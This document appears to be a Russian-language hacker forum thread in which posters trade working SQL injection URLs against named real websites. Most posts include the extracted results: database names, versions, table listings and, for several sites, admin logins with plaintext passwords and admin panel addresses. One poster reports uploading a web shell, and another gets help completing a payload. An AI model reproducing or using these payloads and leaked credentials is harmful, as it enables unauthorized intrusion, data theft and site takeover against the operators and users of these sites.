SQL Инъекции

Воть

 

[email protected]
4.1.7-nt
connetik_ample


админк:
http://www.amplemama.ca/bizcura/
аплоад картинок, но..ничего больше(

 

http://solf.ru/main.php?p=-111+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1--
users:
-id
-username
-password
-fname
-email

http://solf.ru/main.php?p=-111+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0x7961626c6f6b6f6d61696c+limit+1,1--
mail:
-id
-email
-name
-code

дальше кому интересно - уже сами -)

 

http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3+from+drinksadmin/*

админка
http://www.fivedollarscripts.com/drinks/admin2

Ну тут тупо инекция пашет а в админку непопасть.

 

http://all4sims.de/board/filebase.php?userid=1'
lol истина гдето рядом -) мож даже скуль есть..

Code:

SQL-DATABASE ERROR

Database error in WoltLab Burning Board (2.3.6 pl2): Invalid SQL: SELECT username FROM bb1_users WHERE userid='1'' 
mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 
mysql error number: 1064 
mysql version: 5.0.45-community 
php version: 4.4.9 
Date: 13.08.2008 @ 18:37 
Script: /board/filebase.php?userid=1' 
Referer:

 

я так не думаю <_<

 

Code:

http://www.myfourthirds.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,%206,7,8,concat_ws(0x3a,us er_email,user_passwd),10,11%20+from+users --

 

Code:

http://www.ostim.org.tr/ostim/product.php?lang=ALM&productID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3/*

5.0.22:samidb:sami@localhost

table

[samidb]
[OLDcontentstatistics]
secenek
lang
tarih
[adresler]
adres
[anket]
ankettipi
anket
yayintarihi
kaldirmatarihi
icerik

 

=)

 

Code:

http://members.lycos.co.uk/lyk7/gallery/viewphoto.php?photo_id=-1+UNION+SELECT+0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,concat(0x3a,version(),database(),us er()),0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439 --

Version:4.0.18-standard
DBname:lyk7_uk_db
User:[email protected]

 

+)

 

Code:

http://www.superherohype.com/news/jamesbondnews.php?id=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2/*

 

http://microsoft.ugt.ge/index.php?id=1_1&blogid=-1+union+select+1,2,3,4,5,concat(username,0x3a3a,password),7+from+authenticate+limit+0,10

админка: http://microsoft.ugt.ge/admin/

login ->microsoft
pass->mic_admin$

 

Вот нашёл:
http://7c-rnd.ru/card.php?to=1&id=662'
Но не могу раскрутить,помогите горе хакеру.

 

Code:

http://7c-rnd.ru/card.php?to=1&id=662+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+LIMIT+1,1--

Ну вот и все

 

большое спасибо,докапал дальше:

Code:

http://7c-rnd.ru/card.php?to=1&id=662+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,%20%2014,15,16,concat_ws(0x3a,version(),user(),database())+LIMIT+1,1--

base:crndru63_contine5
user:crndru63_contine@localhost
version:4.0.27-logк сожелению

 

http://www.istina.info/article.php?i=1'+union+select+1,concat(oprname,0x3a3a,pwd,0x3a3a,prvLevel),3,4,5+from+church.church_users+limit+0,10/*

Смотрим внутри:

Login: pavelyk
Pass: pasha

Админка: http://www.istina.info/admin

 

http://www.nodialawoffice.ge/lawyer_det.php?Id=-1+union+select+1,2,3,concat(username,0x3a3a,pass),5,6,7+from+law_users--

login: admin
pass: barrabas

http://www.nodialawoffice.ge/admin

Залил шел.... =)

 

Вот есчё нашёл:

Code:

http://www.michaelpollan.com/article.php?id=-87+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10--

base:pollan_articles
user:pollan_article@localhost
version:4.1.22-standard опять не везёт.

 

DBname: db_metalmaremma
Username: [email protected]
Version: 5.0.37-log

db_metalmaremma
db_cms

==================================================

Version: 5.0.45
Uname: coopturi@localhost
Database: coopturi